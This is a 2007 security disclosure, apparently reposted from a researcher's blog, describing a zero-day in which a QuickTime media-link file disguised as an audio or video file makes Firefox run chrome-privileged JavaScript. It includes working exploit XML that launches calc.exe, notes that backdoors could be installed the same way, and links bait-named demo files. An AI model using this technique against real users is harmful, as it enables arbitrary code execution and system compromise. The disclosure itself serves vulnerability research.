Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17991
HistorySep 13, 2007 - 12:00 a.m.

0DAY: QuickTime pwns Firefox

2007-09-1300:00:00
vulners.com
3

0DAY: QuickTime pwns Firefox
published: September 12th, 2007

It seams that QuickTime media formats can hack into Firefox. The result of this vulnerability can lead to full compromise of the browser and maybe even the underlaying operating system. Don’t try this at home.
300 movie trailer

Before we move on, I have to say a few things. Last year I disclosed two highly critical QuickTime vulnerabilities here and here. The first vulnerability was fixed but the second one was completely ignored. I tried to bring the spot light on the second vulnerability one more time over here, yet nobody listened. So, I decided to post a demonstration of how a Low risk issue can be turned into a very easy to perform HIGH risk attack.

The exploit is rather simple. But first, here is a simple QTL file which instructs the browser to display a friendly alert('whats up…') message on the screen:

<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="presentation.mov" autoplay="true" qtnext="javascript:alert('whats up…')"/>

The most interesting thing about this simple XML file is that we can save it with QuickTime supported extension in order to mislead the user. If you check about:plugins you will see that QuickTime supports several media formats. We can use the audio and video formats only. This means that you can paste the above code into files with extensions: 3g2, 3gp, 3gp2, 3gpp, AMR, aac, adts, aif, aifc, aiff, amc, au, avi, bwf, caf, cdda, cel, flc, fli, gsm, m15, m1a, m1s, m1v, m2a, m4a, m4b, m4p, m4v, m75, mac, mov, mp2, mp3, mp4, mpa, mpeg, mpg, mpm, mpv, mqv, pct, pic, pict, png, pnt, pntg, qcp, qt, qti, qtif, rgb, rts, rtsp, sdp, sdv, sgi, snd, ulw, vfw, wav and others.

Enough theory, show me some action. The exploit that gains chrome privileges looks like this:

<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\\windows\\system32\\calc.exe');process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(true,[],0);void(0);"/>

In practice I can do anything with the browser, like installing browser backdoors, and the operating system if the victim is running with administrative privileges. However, just for the sake of this demonstration, I simply open calc.exe. Keep in mind that the exploit is cross-platformed.

If you dare to try this in your browser, here is a list of a few files you have to click on. They are not malicious. You have my word.
launch:
http://www.gnucitizen.org/projects/0day-quicktime-pwns-firefox/BEYONCE.mp3
http://www.gnucitizen.org/projects/0day-quicktime-pwns-firefox/pr0n0.mov
http://www.gnucitizen.org/projects/0day-quicktime-pwns-firefox/FunnyDog.mpeg
http://www.gnucitizen.org/projects/0day-quicktime-pwns-firefox/GhostInTheShell.avi

BTW, QuickTime comes by default with iTunes. Therefore, iTunes users are most affected.